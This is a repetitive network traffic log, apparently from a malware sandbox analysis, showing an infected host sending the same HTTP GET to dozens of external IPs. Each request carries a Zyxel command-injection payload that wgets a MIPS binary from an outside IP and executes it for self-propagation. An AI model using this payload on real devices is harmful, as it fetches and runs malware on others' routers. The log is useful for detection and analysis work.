                                                Jan 12, 2024 18:16:07.087580919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                361192.168.2.2351680151.162.105.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087613106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                362192.168.2.234572053.128.158.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087644100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                363192.168.2.2355446140.238.197.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087703943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                364192.168.2.2337668141.127.212.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087738991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                365192.168.2.2343114210.35.98.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087759018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                366192.168.2.235897068.43.100.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087812901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                367192.168.2.234148012.70.92.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087847948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                368192.168.2.2333066157.121.228.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087886095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                369192.168.2.235462843.14.226.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087929010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                370192.168.2.234502871.193.28.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087960958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                371192.168.2.233527044.106.97.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.087996960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                372192.168.2.234825469.173.238.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088054895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                373192.168.2.23597949.112.174.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088088036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                374192.168.2.233896299.105.151.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088119984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                375192.168.2.2347572206.116.126.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088149071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                376192.168.2.2359586104.147.253.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088180065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                377192.168.2.233485490.197.48.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088221073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                378192.168.2.235081470.238.175.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088264942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                379192.168.2.2357844149.81.169.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088320971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                380192.168.2.2349620114.178.99.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088355064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                381192.168.2.234839294.112.125.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088380098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                382192.168.2.2348196118.34.119.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088422060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                383192.168.2.234583067.63.43.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088457108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                384192.168.2.235102449.32.41.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088490009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                385192.168.2.234906486.122.185.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088515043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                386192.168.2.233718872.131.35.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088551998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                387192.168.2.2348052181.252.193.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088609934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                388192.168.2.233449419.6.207.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088629007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                389192.168.2.236061620.145.15.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088670015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                390192.168.2.234990652.166.73.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088701963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                391192.168.2.2359792221.23.173.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088718891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                392192.168.2.2352546142.14.184.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088771105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                393192.168.2.234657243.170.51.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088809967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                394192.168.2.2350950161.214.41.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088830948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                395192.168.2.23369781.107.52.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088897943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                396192.168.2.2335884165.232.19.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088927031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                397192.168.2.2347044107.197.187.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088967085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                398192.168.2.2339638172.167.7.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.088996887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                399192.168.2.2340420202.22.97.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089047909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                400192.168.2.2360830117.156.164.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089076996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                401192.168.2.23575042.26.110.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089119911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                402192.168.2.235947693.150.200.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089167118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                403192.168.2.2338228163.19.3.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089214087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                404192.168.2.2347032118.91.65.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089248896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                405192.168.2.2338834149.246.2.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089293003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                406192.168.2.23496442.90.15.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089338064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                407192.168.2.2338618133.155.165.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089363098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                408192.168.2.2333928174.128.123.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089416027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                409192.168.2.233690899.174.154.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089453936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                410192.168.2.2336848218.163.189.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089493990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                411192.168.2.234716881.92.68.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089530945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                412192.168.2.235522471.125.180.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089561939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                413192.168.2.233333899.51.73.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089589119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                414192.168.2.233604261.8.213.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089648962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                415192.168.2.2333966155.79.30.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089677095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                416192.168.2.2343888150.158.86.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089728117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                417192.168.2.235939020.89.51.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089756966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                418192.168.2.2352816189.128.186.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089781046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                419192.168.2.235418836.62.206.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089812994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                420192.168.2.2339736162.47.65.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089832067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                421192.168.2.235785657.32.35.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089879990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                422192.168.2.2344886139.156.157.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:07.089926958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                423192.168.2.2339972111.219.202.54443
                                                TimestampBytes transferredDirectionData
